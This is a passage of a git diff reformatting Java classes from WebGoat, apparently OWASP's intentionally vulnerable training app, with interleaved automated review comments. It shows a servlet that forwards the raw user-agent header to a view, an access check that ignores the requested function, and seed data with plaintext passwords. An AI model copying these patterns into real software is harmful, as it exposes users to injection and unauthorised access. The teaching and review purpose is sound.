@@ -1 +1 @@ -package org.owasp.webgoat.servlets; import java.io.IOException; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; /******************************************************************************* * * * This file is part of WebGoat, an Open Web Application Security Project * utility. For details, please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * * This program is free software; you can redistribute it and/or modify it under * the terms of the GNU General Public License as published by the Free Software * Foundation; either version 2 of the License, or (at your option) any later * version. * * This program is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more * details. * * You should have received a copy of the GNU General Public License along with * this program; if not, write to the Free Software Foundation, Inc., 59 Temple * Place - Suite 330, Boston, MA 02111-1307, USA. * * Getting Source ============== * * Source for this application is maintained at code.google.com, a repository * for free software projects. 
* * For details, please see http://code.google.com/p/webgoat/ */ public class Controller extends HttpServlet { private static final long serialVersionUID = 1L; protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { doPost(request, response); } protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String userAgent = request.getHeader("user-agent"); String clientBrowser = "Not known!"; if (userAgent != null) { clientBrowser = userAgent; } request.setAttribute("client.browser", clientBrowser); request.getRequestDispatcher("/view.jsp").forward(request, response); } } \ No newline at end of file + package org.owasp.webgoat.servlets; import java.io.IOException; import javax.servlet.ServletException; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; /*************************************************************************************************** * * * This file is part of WebGoat, an Open Web Application Security Project utility. For details, * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * * This program is free software; you can redistribute it and/or modify it under the terms of the * GNU General Public License as published by the Free Software Foundation; either version 2 of the * License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * General Public License for more details. * * You should have received a copy of the GNU General Public License along with this program; if * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA * 02111-1307, USA. 
* * Getting Source ============== * * Source for this application is maintained at code.google.com, a repository for free software * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class Controller extends HttpServlet { private static final long serialVersionUID = 1L; protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { doPost(request, response); } protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String userAgent = request.getHeader("user-agent"); String clientBrowser = "Not known!"; if (userAgent != null) { clientBrowser = userAgent; } request.setAttribute("client.browser", clientBrowser); request.getRequestDispatcher("/view.jsp").forward(request, response); } } \ No newline at end of file diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java b/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java index e01428c25..49423ff2a 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/Authorization.java 
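Review bot: `doPost` copies the `user-agent` request header into the `client.browser` request attribute unchanged before forwarding to `/view.jsp`; whether that value is HTML-encoded when rendered is decided in the JSP, which is outside this hunk, so I would confirm the view escapes it rather than emitting it raw. A short comment at the `setAttribute` call would record the expectation: `// Raw header value: view.jsp must HTML-encode client.browser before rendering it.`. The hunk itself is a whole-file reformat, so the `@@ -1 +1 @@` shape suggests the old file had no newline characters at all; that is worth mentioning in the commit message since it hides which lines actually changed.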
@@ -1,55 +1,53 @@ + package org.owasp.webgoat.session; import java.util.Hashtable; import java.util.Map; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class Authorization { - Map permissions = new Hashtable(); + Map permissions = new Hashtable(); + public Authorization() + { + } - public Authorization() - {} + public void setPermission(int userId, int functionId) + { + permissions.put(new Integer(userId), new Integer(functionId)); + } - - public void setPermission(int userId, int functionId) - { - permissions.put(new Integer(userId), new Integer(functionId)); - } - - - public boolean isAllowed(int userId, int functionId) - { - return (permissions.get(new Integer(userId)) != null); - } + public boolean isAllowed(int userId, int functionId) + { + return (permissions.get(new Integer(userId)) != null); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/Course.java b/main/project/JavaSource/org/owasp/webgoat/session/Course.java index efbc9dc33..31580f223 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/Course.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/Course.java @@ -1,3 +1,4 @@ + package org.owasp.webgoat.session; import java.io.File; 
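Review bot: `isAllowed(int userId, int functionId)` never reads `functionId`; it returns true as soon as the user has any entry in `permissions`, and `setPermission` stores a single `Integer` per user, so a second call for the same user silently overwrites the first. If `Authorization` is meant to be a real access check rather than deliberately broken lesson material (the file gives no hint either way, so this should be confirmed), the map should hold a set of function ids per user and `isAllowed` should test membership of the requested function, as sketched below; this needs `java.util.Set` and `java.util.HashSet` added to the imports. Either way the class Javadoc should state which of the two it is, e.g. `/** Per-user function permissions. Intentionally coarse: grants access to every function once any permission is set (lesson material). */` if the current behaviour is intended.
```java
// Map<Integer userId, Set<Integer functionId>>; requires java.util.Set and java.util.HashSet
Map permissions = new Hashtable();

public void setPermission(int userId, int functionId)
{
    Set functions = (Set) permissions.get(new Integer(userId));
    if (functions == null)
    {
        functions = new HashSet();
        permissions.put(new Integer(userId), functions);
    }
    functions.add(new Integer(functionId));
}

public boolean isAllowed(int userId, int functionId)
{
    Set functions = (Set) permissions.get(new Integer(userId));
    // Deny unless this exact function was granted to this user.
    return (functions != null && functions.contains(new Integer(functionId)));
}
```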
@@ -9,435 +10,425 @@ import java.util.List; import java.util.Set; import java.util.Vector; import java.util.LinkedList; - import javax.servlet.ServletContext; - import org.owasp.webgoat.HammerHead; import org.owasp.webgoat.lessons.AbstractLesson; import org.owasp.webgoat.lessons.Category; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. 
* - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. + * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * - * @author Bruce Mayhew WebGoat - * @created October 28, 2003 + * + * @author Bruce Mayhew WebGoat + * @created October 28, 2003 */ public class Course { - private List lessons = new LinkedList(); + private List lessons = new LinkedList(); - private final static String PROPERTIES_FILENAME = HammerHead.propertiesPath; + private final static String PROPERTIES_FILENAME = HammerHead.propertiesPath; - private WebgoatProperties properties = null; - - private List files = new LinkedList(); + private WebgoatProperties properties = null; - private WebgoatContext webgoatContext; + private List files = new LinkedList(); - public Course() - { + private WebgoatContext webgoatContext; + + public Course() + { try { - properties = new WebgoatProperties(PROPERTIES_FILENAME); - } - catch (IOException e) + properties = new WebgoatProperties(PROPERTIES_FILENAME); + } catch (IOException e) { - System.out.println("Error loading WebGoat properties"); - e.printStackTrace(); + System.out.println("Error loading WebGoat properties"); + e.printStackTrace(); } - } - - /** - * Take an absolute file and return the filename. - * - * Ex. 
/etc/password becomes password - * - * @param s - * @return the file name - */ - private static String getFileName(String s) - { - String fileName = new File(s).getName(); - - if(fileName.indexOf("/") != -1) + } + + /** + * Take an absolute file and return the filename. + * + * Ex. /etc/password becomes password + * + * @param s + * @return the file name + */ + private static String getFileName(String s) + { + String fileName = new File(s).getName(); + + if (fileName.indexOf("/") != -1) { fileName = fileName.substring(fileName.lastIndexOf("/"), fileName.length()); } - - if(fileName.indexOf(".") != -1) + + if (fileName.indexOf(".") != -1) { fileName = fileName.substring(0, fileName.indexOf(".")); } - + return fileName; - } - - /** - * Take a class name and return the equivalent file name - * - * Ex. org.owasp.webgoat becomes org/owasp/webgoat.java - * - * @param className - * @return - */ - private static String getSourceFile(String className) - { - StringBuffer sb = new StringBuffer(); - - sb.append(className.replace(".", "/")); - sb.append(".java"); - - return sb.toString(); - } + } + /** + * Take a class name and return the equivalent file name + * + * Ex. 
org.owasp.webgoat becomes org/owasp/webgoat.java + * + * @param className + * @return + */ + private static String getSourceFile(String className) + { + StringBuffer sb = new StringBuffer(); - /** - * Takes a file name and builds the class file name - * - * @param fileName Description of the Parameter - * @param path Description of the Parameter - * @return Description of the Return Value - */ - private static String getClassFile(String fileName, String path) - { - String ext = ".class"; + sb.append(className.replace(".", "/")); + sb.append(".java"); + + return sb.toString(); + } + + /** + * Takes a file name and builds the class file name + * + * @param fileName + * Description of the Parameter + * @param path + * Description of the Parameter + * @return Description of the Return Value + */ + private static String getClassFile(String fileName, String path) + { + String ext = ".class"; fileName = fileName.trim(); - + /** - * We do not handle directories. - * We do not handle files with different extensions + * We do not handle directories. 
We do not handle files with different extensions */ - if(fileName.endsWith("/") || !fileName.endsWith(ext)) - { - return null; - } - + if (fileName.endsWith("/") || !fileName.endsWith(ext)) { return null; } + // if the file is in /WEB-INF/classes strip the dir info off int index = fileName.indexOf("/WEB-INF/classes/"); if (index != -1) { - fileName = fileName.substring(index + "/WEB-INF/classes/".length(), fileName.length() - ext.length()); - fileName = fileName.replace('/', '.'); - fileName = fileName.replace('\\', '.'); + fileName = fileName.substring(index + "/WEB-INF/classes/".length(), fileName.length() - ext.length()); + fileName = fileName.replace('/', '.'); + fileName = fileName.replace('\\', '.'); } else { - // Strip off the leading path info - fileName = fileName.substring(path.length(), fileName.length() - ext.length()); + // Strip off the leading path info + fileName = fileName.substring(path.length(), fileName.length() - ext.length()); } - + return fileName; - } - - /** - * Gets the categories attribute of the Course object - * - * @return The categories value - */ - public List getCategories() - { - List categories = new ArrayList(); - Iterator iter = lessons.iterator(); - - while (iter.hasNext()) - { - AbstractLesson lesson = (AbstractLesson) iter.next(); - - if (!categories.contains(lesson.getCategory())) - { - categories.add(lesson.getCategory()); - } } - Collections.sort(categories); - - return categories; - } - - - /** - * Gets the firstLesson attribute of the Course object - * - * @return The firstLesson value - */ - public AbstractLesson getFirstLesson() - { - List roles = new ArrayList(); - roles.add(AbstractLesson.USER_ROLE); - // Category 0 is the admin function. We want the first real category - // to be returned. 
This is noramally the General category and the Http Basics lesson - return ((AbstractLesson) getLessons((Category) getCategories().get(1), - roles).get(0)); - } - - - /** - * Gets the lesson attribute of the Course object - * - * @param lessonId Description of the Parameter - * @param role Description of the Parameter - * @return The lesson value - */ - public AbstractLesson getLesson(WebSession s, int lessonId, List roles) - { - if (s.isHackedAdmin()) + /** + * Gets the categories attribute of the Course object + * + * @return The categories value + */ + public List getCategories() { - roles.add(AbstractLesson.HACKED_ADMIN_ROLE); - } - //System.out.println("getLesson() with roles: " + roles); - Iterator iter = lessons.iterator(); + List categories = new ArrayList(); + Iterator iter = lessons.iterator(); - while (iter.hasNext()) - { - AbstractLesson lesson = iter.next(); + while (iter.hasNext()) + { + AbstractLesson lesson = (AbstractLesson) iter.next(); - //System.out.println("getLesson() at role: " + lesson.getRole()); - if (lesson.getScreenId() == lessonId - && roles.contains(lesson.getRole())) - { - return lesson; - } + if (!categories.contains(lesson.getCategory())) + { + categories.add(lesson.getCategory()); + } + } + + Collections.sort(categories); + + return categories; } - return null; - } - - - public AbstractLesson getLesson(WebSession s, int lessonId, String role) - { - List roles = new Vector(); - roles.add(role); - return getLesson(s, lessonId, roles); - } - - - public List getLessons(WebSession s, String role) - { - List roles = new Vector(); - roles.add(role); - return getLessons(s, roles); - } - - - /** - * Gets the lessons attribute of the Course object - * - * @param role Description of the Parameter - * @return The lessons value - */ - public List getLessons(WebSession s, List roles) - { - if (s.isHackedAdmin()) + /** + * Gets the firstLesson attribute of the Course object + * + * @return The firstLesson value + */ + public AbstractLesson 
getFirstLesson() { - roles.add(AbstractLesson.HACKED_ADMIN_ROLE); - } - List lessonList = new ArrayList(); - Iterator categoryIter = getCategories().iterator(); - - while (categoryIter.hasNext()) - { - lessonList.addAll(getLessons(s, (Category) categoryIter.next(), - roles)); - } - return lessonList; - } - - - /** - * Gets the lessons attribute of the Course object - * - * @param category Description of the Parameter - * @param role Description of the Parameter - * @return The lessons value - */ - private List getLessons(Category category, List roles) - { - List lessonList = new ArrayList(); - - Iterator iter = lessons.iterator(); - while (iter.hasNext()) - { - AbstractLesson lesson = (AbstractLesson) iter.next(); - - if (lesson.getCategory().equals(category) - && roles.contains(lesson.getRole())) - { - lessonList.add(lesson); - } + List roles = new ArrayList(); + roles.add(AbstractLesson.USER_ROLE); + // Category 0 is the admin function. We want the first real category + // to be returned. 
This is noramally the General category and the Http Basics lesson + return ((AbstractLesson) getLessons((Category) getCategories().get(1), roles).get(0)); } - Collections.sort(lessonList); - // System.out.println(java.util.Arrays.asList(lessonList)); - return lessonList; - } - - - public List getLessons(WebSession s, Category category, String role) - { - List roles = new Vector(); - roles.add(role); - return getLessons(s, category, roles); - } - - - public List getLessons(WebSession s, Category category, List roles) - { - if (s.isHackedAdmin()) + /** + * Gets the lesson attribute of the Course object + * + * @param lessonId + * Description of the Parameter + * @param role + * Description of the Parameter + * @return The lesson value + */ + public AbstractLesson getLesson(WebSession s, int lessonId, List roles) { - roles.add(AbstractLesson.HACKED_ADMIN_ROLE); - } - return getLessons(category, roles); - } - - /** - * Load all of the filenames into a temporary cache - * - * @param context - * @param path - */ - private void loadFiles(ServletContext context, String path) - { - Set resourcePaths = context.getResourcePaths(path); - Iterator itr = resourcePaths.iterator(); - - while(itr.hasNext()) - { - String file = (String)itr.next(); - - if(file.length() != 1 && file.endsWith("/")) - { - loadFiles(context, file); - } - else - { - files.add(file); - } - } - } - - /** - * Instantiate all the lesson objects into a cache - * - * @param path - */ - private void loadLessons(String path) - { - Iterator itr = files.iterator(); - - while(itr.hasNext()) - { - String file = (String)itr.next(); - String className = getClassFile(file, path); - - if(className != null && !className.endsWith("_i")) - { - try - { - Class c = Class.forName(className); - Object o = c.newInstance(); - - if(o instanceof AbstractLesson) - { - AbstractLesson lesson = (AbstractLesson)o; - lesson.setWebgoatContext(webgoatContext); - - lesson.update(properties); - - if(lesson.getHidden() == false) - { - 
lessons.add(lesson); - } - } - } - catch (Exception e) - { - //System.out.println("Warning: " + e.getMessage()); - } - } - } - } - - /** - * For each lesson, set the source file and lesson file - */ - private void loadResources() - { - Iterator lessonItr = lessons.iterator(); - - while(lessonItr.hasNext()) - { - AbstractLesson lesson = (AbstractLesson)lessonItr.next(); - String className = lesson.getClass().getName(); - String classFile = getSourceFile(className); - - Iterator fileItr = files.iterator(); - - while(fileItr.hasNext()) - { - String absoluteFile = (String)fileItr.next(); - String fileName = getFileName(absoluteFile); - //System.out.println("Course: looking at file: " + absoluteFile); - - if(absoluteFile.endsWith(classFile)) - { - //System.out.println("Set source file for " + classFile); - lesson.setSourceFileName(absoluteFile); - } - - if(absoluteFile.startsWith("/lesson_plans") && absoluteFile.endsWith(".html") && className.endsWith(fileName)) - { - //System.out.println("DEBUG: setting lesson plan file " + absoluteFile + " for lesson " + lesson.getClass().getName()); - //System.out.println("fileName: " + fileName + " == className: " + className ); - lesson.setLessonPlanFileName(absoluteFile); - } - if(absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") && className.endsWith(fileName)) - { - //System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " for lesson " + lesson.getClass().getName()); - //System.out.println("fileName: " + fileName + " == className: " + className ); - lesson.setLessonSolutionFileName(absoluteFile); - } - } - } - } + if (s.isHackedAdmin()) + { + roles.add(AbstractLesson.HACKED_ADMIN_ROLE); + } + // System.out.println("getLesson() with roles: " + roles); + Iterator iter = lessons.iterator(); - /** - * Description of the Method - * - * @param path Description of the Parameter - * @param context Description of the Parameter - */ - public void loadCourses(WebgoatContext webgoatContext, 
ServletContext context, String path) - { - this.webgoatContext = webgoatContext; - loadFiles(context, path); - loadLessons(path); - loadResources(); - } + while (iter.hasNext()) + { + AbstractLesson lesson = iter.next(); + + // System.out.println("getLesson() at role: " + lesson.getRole()); + if (lesson.getScreenId() == lessonId && roles.contains(lesson.getRole())) { return lesson; } + } + + return null; + } + + public AbstractLesson getLesson(WebSession s, int lessonId, String role) + { + List roles = new Vector(); + roles.add(role); + return getLesson(s, lessonId, roles); + } + + public List getLessons(WebSession s, String role) + { + List roles = new Vector(); + roles.add(role); + return getLessons(s, roles); + } + + /** + * Gets the lessons attribute of the Course object + * + * @param role + * Description of the Parameter + * @return The lessons value + */ + public List getLessons(WebSession s, List roles) + { + if (s.isHackedAdmin()) + { + roles.add(AbstractLesson.HACKED_ADMIN_ROLE); + } + List lessonList = new ArrayList(); + Iterator categoryIter = getCategories().iterator(); + + while (categoryIter.hasNext()) + { + lessonList.addAll(getLessons(s, (Category) categoryIter.next(), roles)); + } + return lessonList; + } + + /** + * Gets the lessons attribute of the Course object + * + * @param category + * Description of the Parameter + * @param role + * Description of the Parameter + * @return The lessons value + */ + private List getLessons(Category category, List roles) + { + List lessonList = new ArrayList(); + + Iterator iter = lessons.iterator(); + while (iter.hasNext()) + { + AbstractLesson lesson = (AbstractLesson) iter.next(); + + if (lesson.getCategory().equals(category) && roles.contains(lesson.getRole())) + { + lessonList.add(lesson); + } + } + + Collections.sort(lessonList); + // System.out.println(java.util.Arrays.asList(lessonList)); + return lessonList; + } + + public List getLessons(WebSession s, Category category, String role) + { + List roles 
= new Vector(); + roles.add(role); + return getLessons(s, category, roles); + } + + public List getLessons(WebSession s, Category category, List roles) + { + if (s.isHackedAdmin()) + { + roles.add(AbstractLesson.HACKED_ADMIN_ROLE); + } + return getLessons(category, roles); + } + + /** + * Load all of the filenames into a temporary cache + * + * @param context + * @param path + */ + private void loadFiles(ServletContext context, String path) + { + Set resourcePaths = context.getResourcePaths(path); + Iterator itr = resourcePaths.iterator(); + + while (itr.hasNext()) + { + String file = (String) itr.next(); + + if (file.length() != 1 && file.endsWith("/")) + { + loadFiles(context, file); + } + else + { + files.add(file); + } + } + } + + /** + * Instantiate all the lesson objects into a cache + * + * @param path + */ + private void loadLessons(String path) + { + Iterator itr = files.iterator(); + + while (itr.hasNext()) + { + String file = (String) itr.next(); + String className = getClassFile(file, path); + + if (className != null && !className.endsWith("_i")) + { + try + { + Class c = Class.forName(className); + Object o = c.newInstance(); + + if (o instanceof AbstractLesson) + { + AbstractLesson lesson = (AbstractLesson) o; + lesson.setWebgoatContext(webgoatContext); + + lesson.update(properties); + + if (lesson.getHidden() == false) + { + lessons.add(lesson); + } + } + } catch (Exception e) + { + // System.out.println("Warning: " + e.getMessage()); + } + } + } + } + + /** + * For each lesson, set the source file and lesson file + */ + private void loadResources() + { + Iterator lessonItr = lessons.iterator(); + + while (lessonItr.hasNext()) + { + AbstractLesson lesson = (AbstractLesson) lessonItr.next(); + String className = lesson.getClass().getName(); + String classFile = getSourceFile(className); + + Iterator fileItr = files.iterator(); + + while (fileItr.hasNext()) + { + String absoluteFile = (String) fileItr.next(); + String fileName = 
getFileName(absoluteFile); + // System.out.println("Course: looking at file: " + absoluteFile); + + if (absoluteFile.endsWith(classFile)) + { + // System.out.println("Set source file for " + classFile); + lesson.setSourceFileName(absoluteFile); + } + + if (absoluteFile.startsWith("/lesson_plans") && absoluteFile.endsWith(".html") + && className.endsWith(fileName)) + { + // System.out.println("DEBUG: setting lesson plan file " + absoluteFile + " for + // lesson " + + // lesson.getClass().getName()); + // System.out.println("fileName: " + fileName + " == className: " + className ); + lesson.setLessonPlanFileName(absoluteFile); + } + if (absoluteFile.startsWith("/lesson_solutions") && absoluteFile.endsWith(".html") + && className.endsWith(fileName)) + { + // System.out.println("DEBUG: setting lesson solution file " + absoluteFile + " + // for lesson " + + // lesson.getClass().getName()); + // System.out.println("fileName: " + fileName + " == className: " + className ); + lesson.setLessonSolutionFileName(absoluteFile); + } + } + } + } + + /** + * Description of the Method + * + * @param path + * Description of the Parameter + * @param context + * Description of the Parameter + */ + public void loadCourses(WebgoatContext webgoatContext, ServletContext context, String path) + { + this.webgoatContext = webgoatContext; + loadFiles(context, path); + loadLessons(path); + loadResources(); + } } diff --git a/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java b/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java index c5da993f9..b46f6c398 100644 --- a/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java +++ b/main/project/JavaSource/org/owasp/webgoat/session/CreateDB.java 
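Review bot: In `loadLessons` the `catch (Exception e)` block contains only a commented-out println, so a lesson class whose `Class.forName`, `newInstance()` or `update(properties)` throws is dropped without any record, and since this loop is the only place `lessons` is populated a broken or misconfigured lesson silently vanishes from the course. At minimum report it in the same style the constructor already uses, e.g. `System.out.println("Warning: could not load lesson " + className + ": " + e);`. Separately, `getLesson(WebSession, int, List)`, `getLessons(WebSession, List)` and `getLessons(WebSession, Category, List)` each append `HACKED_ADMIN_ROLE` to the caller-supplied `roles` list, so the caller's list is mutated and the nested call from `getLessons(WebSession, List)` adds the role a second time per category. Copying the list before the add (`roles = new ArrayList(roles);`) would remove both side effects. These behaviours are unchanged by this commit, which only reformats.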
@@ -1,788 +1,751 @@ + package org.owasp.webgoat.session; import java.sql.Connection; import java.sql.SQLException; import java.sql.Statement; - import org.owasp.webgoat.lessons.AbstractLesson; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * * @author Jeff Williams Aspect Security */ public class CreateDB { - /** - * Description of the Method - * - * @param connection Description of the Parameter - * - * @exception SQLException Description of the Exception - */ - private void createMessageTable(Connection connection) throws SQLException - { - Statement statement = connection.createStatement(); + /** + * Description of the Method + * + * @param connection + * Description of the Parameter + * + * @exception SQLException + * Description of the Exception + */ + private void createMessageTable(Connection connection) throws SQLException + { + Statement statement = connection.createStatement(); - // Drop admin user table - try - { - String dropTable = "DROP TABLE messages"; - statement.executeUpdate(dropTable); - } - catch (SQLException e) - { - System.out.println("Error dropping message database"); + // Drop admin user table + try + { + String dropTable = "DROP TABLE messages"; + statement.executeUpdate(dropTable); + } catch (SQLException e) + { + System.out.println("Error dropping message database"); + } + + // Create the new table + try + { + String createTableStatement = "CREATE TABLE messages (" + "num int not null," + "title varchar(50)," + + "message varchar(200)," + "user_name varchar(50) not null " + ")"; + statement.executeUpdate(createTableStatement); + } catch (SQLException e) + { + System.out.println("Error creating message database"); + e.printStackTrace(); + } } - 
// Create the new table - try + /** + * Description of the Method + * + * @param connection + * Description of the Parameter + * + * @exception SQLException + * Description of the Exception + */ + private void createProductTable(Connection connection) throws SQLException { - String createTableStatement = "CREATE TABLE messages (" - + "num int not null," + "title varchar(50)," - + "message varchar(200)," - + "user_name varchar(50) not null " + ")"; - statement.executeUpdate(createTableStatement); - } - catch (SQLException e) - { - System.out.println("Error creating message database"); - e.printStackTrace(); - } - } + Statement statement = connection.createStatement(); + // Drop admin user table + try + { + String dropTable = "DROP TABLE product_system_data"; + statement.executeUpdate(dropTable); + } catch (SQLException e) + { + System.out.println("Error dropping product database"); + } - /** - * Description of the Method - * - * @param connection Description of the Parameter - * - * @exception SQLException Description of the Exception - */ - private void createProductTable(Connection connection) throws SQLException - { - Statement statement = connection.createStatement(); + // Create the new table + try + { + String createTableStatement = "CREATE TABLE product_system_data (" + + "productid varchar(6) not null primary key," + "product_name varchar(20)," + "price varchar(10)" + + ")"; + statement.executeUpdate(createTableStatement); + } catch (SQLException e) + { + System.out.println("Error creating product database"); + e.printStackTrace(); + } - // Drop admin user table - try - { - String dropTable = "DROP TABLE product_system_data"; - statement.executeUpdate(dropTable); - } - catch (SQLException e) - { - System.out.println("Error dropping product database"); + // Populate + String insertData1 = "INSERT INTO product_system_data VALUES ('32226','Dog Bone','$1.99')"; + String insertData2 = "INSERT INTO product_system_data VALUES ('35632','DVD Player','$214.99')"; + 
String insertData3 = "INSERT INTO product_system_data VALUES ('24569','60 GB Hard Drive','$149.99')"; + String insertData4 = "INSERT INTO product_system_data VALUES ('56970','80 GB Hard Drive','$179.99')"; + String insertData5 = "INSERT INTO product_system_data VALUES ('14365','56 inch HDTV','$6999.99')"; + statement.executeUpdate(insertData1); + statement.executeUpdate(insertData2); + statement.executeUpdate(insertData3); + statement.executeUpdate(insertData4); + statement.executeUpdate(insertData5); } - // Create the new table - try + /** + * Description of the Method + * + * @param connection + * Description of the Parameter + * + * @exception SQLException + * Description of the Exception + */ + private void createUserAdminTable(Connection connection) throws SQLException { - String createTableStatement = "CREATE TABLE product_system_data (" - + "productid varchar(6) not null primary key," - + "product_name varchar(20)," + "price varchar(10)" + ")"; - statement.executeUpdate(createTableStatement); - } - catch (SQLException e) - { - System.out.println("Error creating product database"); - e.printStackTrace(); + Statement statement = connection.createStatement(); + + // Drop admin user table + try + { + String dropTable = "DROP TABLE user_system_data"; + statement.executeUpdate(dropTable); + } catch (SQLException e) + { + System.out.println("Error dropping user admin database"); + } + + // Create the new table + try + { + String createTableStatement = "CREATE TABLE user_system_data (" + "userid varchar(5) not null primary key," + + "user_name varchar(12)," + "password varchar(10)," + "cookie varchar(30)" + ")"; + statement.executeUpdate(createTableStatement); + } catch (SQLException e) + { + System.out.println("Error creating user admin database"); + e.printStackTrace(); + } + + // Populate + String insertData1 = "INSERT INTO user_system_data VALUES ('101','jsnow','passwd1', '')"; + String insertData2 = "INSERT INTO user_system_data VALUES ('102','jdoe','passwd2', 
